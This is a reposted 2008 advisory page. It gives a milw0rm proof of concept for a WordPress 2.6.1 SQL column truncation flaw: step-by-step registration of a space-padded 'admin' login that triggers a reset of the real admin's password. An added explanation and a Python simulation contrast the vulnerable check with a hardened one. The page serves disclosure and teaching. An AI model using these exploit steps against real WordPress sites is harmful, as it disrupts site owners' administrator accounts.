WordPress 2.6.1 SQL Column Truncation Vulnerability
Source: 好再见网, 2008-09-22 11:57:18
WordPress users should take note.

# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not a critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remotely change the admin password, if registration is enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all friends

1. go to url: server.com/wp-login.php?action=register
2. register as:
   login: admin[55 space chars]x
   email: your email
   now, we have a duplicated 'admin' account in the database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into the field and submit this form
5. check your email and go to the reset confirmation link
6. admin's password is changed, but the new password will be sent to the correct admin email ;/

# milw0rm.com
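The procedure above works because of two MySQL behaviours described in the suspekt.org write-up: in non-strict sql_mode an over-long value is silently truncated to the column width on INSERT (a warning, not an error), and with the default PAD SPACE collations trailing spaces are ignored by `=`. So the registration uniqueness check sees a brand-new name ("admin", 55 spaces, "x"), but the row that is actually stored is "admin" followed by 55 spaces, which compares equal to "admin". The following Python is an added example written for this page, not code from the PoC author or from WordPress: it models the table and the two MySQL rules in memory, walks the register / lost-password flow, and shows a hardened registration check beside the vulnerable one. Assumptions: `wp_users.user_login` is VARCHAR(60) (hence 5 + 55 + 1 = 61 characters, one over the limit), the e-mail addresses are constructed sample data, and the reset step is a simplified model that picks the first row whose login compares equal, which is what the PoC's last step implies.

```python
from dataclasses import dataclass

# Assumption: WordPress stores user_login in a VARCHAR(60) column.
USER_LOGIN_WIDTH = 60


@dataclass
class Row:
    id: int
    user_login: str
    user_email: str


class NonStrictMySQLUsers:
    """In-memory stand-in for wp_users under MySQL non-strict sql_mode."""

    def __init__(self):
        self.rows = []

    def insert(self, login, email):
        # Non-strict mode: an over-long value is truncated to the column width
        # instead of being rejected. This is the "column truncation".
        stored = login[:USER_LOGIN_WIDTH]
        self.rows.append(Row(len(self.rows) + 1, stored, email))
        return self.rows[-1]

    @staticmethod
    def _eq(a, b):
        # PAD SPACE collation: trailing spaces are not significant for '='.
        return a.rstrip(" ") == b.rstrip(" ")

    def select_by_login(self, login):
        # Models: SELECT * FROM wp_users WHERE user_login = %s ORDER BY ID
        return [r for r in self.rows if self._eq(r.user_login, login)]

    def select_by_email(self, email):
        return [r for r in self.rows if r.user_email == email]


def register(db, login, email):
    """Vulnerable flow: uniqueness is checked on the submitted value,
    but the truncated value is what gets stored."""
    if db.select_by_login(login):
        return None
    return db.insert(login, email)


def lost_password(db, email):
    """Simplified model of the reset: find the account by e-mail, then reset
    the FIRST row whose user_login compares equal to that account's login.
    The returned row is the one whose password is changed and notified."""
    hits = db.select_by_email(email)
    if not hits:
        return None
    return db.select_by_login(hits[0].user_login)[0]


def safe_register(db, login, email):
    """Hardened check (one reasonable fix, not WordPress's own patch):
    reject any name that storage would alter, and compare byte-for-byte
    against what is actually stored. Enabling STRICT_TRANS_TABLES in
    sql_mode would additionally turn the truncating INSERT into an error."""
    if login != login.strip() or len(login) > USER_LOGIN_WIDTH:
        return None
    if any(r.user_login == login for r in db.rows):
        return None
    return db.insert(login, email)


def poc():
    """Replay the six steps of the PoC against the model. Returns the
    attacker's stored row and the row whose password the reset hits."""
    db = NonStrictMySQLUsers()
    db.insert("admin", "admin@example.org")      # constructed: the real admin
    evil_login = "admin" + " " * 55 + "x"        # 61 chars, one over the width
    attacker_row = register(db, evil_login, "attacker@example.net")
    reset_target = lost_password(db, "attacker@example.net")
    return attacker_row, reset_target


if __name__ == "__main__":
    attacker_row, reset_target = poc()
    print("stored attacker login:", repr(attacker_row.user_login))
    print("password reset lands on id", reset_target.id,
          "notified at", reset_target.user_email)
```

Running it shows the attacker's row stored as `'admin'` plus 55 spaces (the `x` was cut off), and the reset landing on row 1, the real admin, whose own e-mail receives the new password; that is exactly the PoC's "not critical" caveat. Registering plain `admin`, or `admin` plus 55 spaces without the trailing `x`, is refused by the vulnerable `register` too, because those compare equal to the existing row; the over-length character is what slips past the check. `safe_register` rejects the padded name outright.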